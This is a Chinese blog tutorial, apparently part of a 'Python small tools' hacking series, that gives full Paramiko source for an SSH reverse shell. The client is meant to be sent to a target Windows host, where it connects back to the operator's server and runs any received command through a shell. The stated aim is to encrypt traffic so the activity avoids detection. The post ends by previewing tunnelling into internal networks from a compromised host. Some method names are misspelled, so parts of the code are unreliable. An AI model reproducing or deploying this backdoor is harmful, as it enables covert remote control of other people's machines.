python小工具学习连载-ssh反向连接

python小工具学习连载

-ssh反向连接-

使用本网站前,请先阅读免责声明,同意其内容后再进行食用!

应用场景

我们之前写的nc可以很轻松的在系统中执行命令,但是有很多时候我们都需要通过流量加密来避免检测,就比如使用ssh进行连接,但是在很多windows电脑中,是没有安装ssh客户端的,而我们用python便可以很轻易的完成一个ssh的客户端,当我们将客户端发送给对方主机后,我们可以在本地运行服务端,让远程的windows来连接我们运行的ssh服务端,我们在服务端输入命令,则客户端会将我们的命令执行并将命令执行结果返回给我们。

实现原理

首先呢,我们需要安装一个第三方模块,Paramiko,可以通过pip直接下载安装。

然后呢,我们首先完成我们客户端的代码。

创建一个文件ssh_client.py

import threading
import paramiko
import subprocess
import sys

def ssh_command(ip,user,passwd,command,port):
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    client.connect(ip,port,username=user,password=passwd)
    ssh_session = client.get_transport().open_session()
    if ssh_session.active:
        ssh_session.send(command)
        print(ssh_session.recv(1024))
        while True:
            command = ssh_session.recv(1024)
            try:
                cmd_output = subprocess.check_output(command,shell=True)
                ssh_session.send(cmd_output)
            except Exception as e:
                ssh_session.send(str(e))
        client.close()
    return

ip =sys.argv[1]
ssh_command(ip,'admin123','admin123','nihao',8001)   

如上代码,我们首先创建了一个ssh用来执行命令的函数,然后使用paramiko模块中的SSHClient创建一个ssh的客户端,在下一行,我们设置自动太监和保存目标ssh服务器的密钥。然后尝试根据我们输入的IP、端口、用户名和密码去连接我们的ssh服务器,当连接建立成功后,在后一行打开一个会话。

然后就进入到我们熟悉的地方了,首先我们先给服务器随便发一个命令,告诉他我们连接成功了,然后等待服务器回应,服务器回应后,开启一个死循环,等待服务器传入命令,执行后发送执行结果返回给服务器。

因为paramiko模块的存在,我们还是可以狠狠轻易的完成这个ssh客户端,而不需要我们去从底层一点点点来写。

然后我们开始完成客户端的代码:

创建一个文件ssh_server.py

import socket
import paramiko
import threading
import sys

from paramiko import server
from paramiko import common

host_key = paramiko.RSAKey(filename='test_rsa.key')

class Server(paramiko.ServerInterface):
    def __init__(self):
        self.event = threading.Event()
    def check_channel_reequest(self,kind,chanid):
        if kind == 'session':
            return paramiko.OPEN_SUCCEEDED
        return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED
    def check_auth_password(self,username,password):
        if (username == 'admin123') and (password == 'admin123'):
            return paramiko.AUTH_SUCCESSFUL
        return paramiko.AUTH_FAILED

server = sys.argv[1]
ssh_port = int(sys.argv[2])
try:
    sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
    sock.bind((server,ssh_port))
    sock.listen(100)
    print("[+] 正在等待连接.....")
    client,addr = sock.accept()
except Exception as e:
    print("[-] error! " + str(e))
    sys.exit(1)
print("[+] 发现一个连接请求!")

try:
    bhSession = paramiko.Transport(client)
    bhSession.add_server_key(host_key)
    server = Server()
    try:
        bhSession.start_server(server=server)
    except paramiko.SSHException as x:
        print('[-] SSH negotiation failed!')
    chan = bhSession.accept(20)
    print("[+] Authenticated!")
    print(chan.recv(1024))
    chan.send("welcome to ssh!")
    while True:
        try:
            command = input("Rnter command:").strip("\n")
            if command != 'exit':
                chan.send(command)
                print(str(chan.recv(1024))+'\n')
            else:
                chan.send('exit')
                print("exiting")
                bhSession.close()
                raise Exception('exit')
        except KeyboardInterrupt:
            bhSession.close()
except Exception as e:
    print('[-] Caught exception:' + str(e))
    try:
        bhSession.close()
    except:
        pass
    sys.exit(1)

首先我先使用了Paramiko的示例文件的密钥,然后创建了一个Server函数,在这个函数中,定义了几个方法,首先是用来接受客户端请求的方法,会返回一个同意开启会话的方法,和一个用于验证用户名的账号和密码。然后在下面的代码中,尝试开始一个socket用来监听端口,如果收到了接受请求,那么接着往下走,我们会使用上面创建的客户端函数开启一个ssh管道并配置认证模式,当一个客户端认证成功并发回消息,然后就是循环接受用户在服务端输入的命令并发送个客户端,并将客户端命令执行结果返回给我们,知道用户输入exit,代表用户想要退出。

好了,现在我们的代码已经编写完成了,我们只需要在我们本地(或VPS)上运行服务端,并输入我们要监听的ip及端口,并且在另一台电脑上运行客户端,输入连接的ip即可完成连接,通过在服务端上发送命令,在客户端执行并获得执行结果。(为了避免客户端输入过多的参数,我只留了一个ip需要用户输出,用户名和密码等参数都写在代码中,如果需要请自行修改)

下集预告

我们本次使用了ssh反向连接去执行了系统的命令,但是ssh的功能还远远不止于此,比我在一个内网环境中,我们获取了一台主机的权限,那么我们遍可以搭建一个ssh隧道,通过该主机去访问内网中的服务,而下次的内容,我们将通过python来对这个内网隧道进行编写。

请登录后发表评论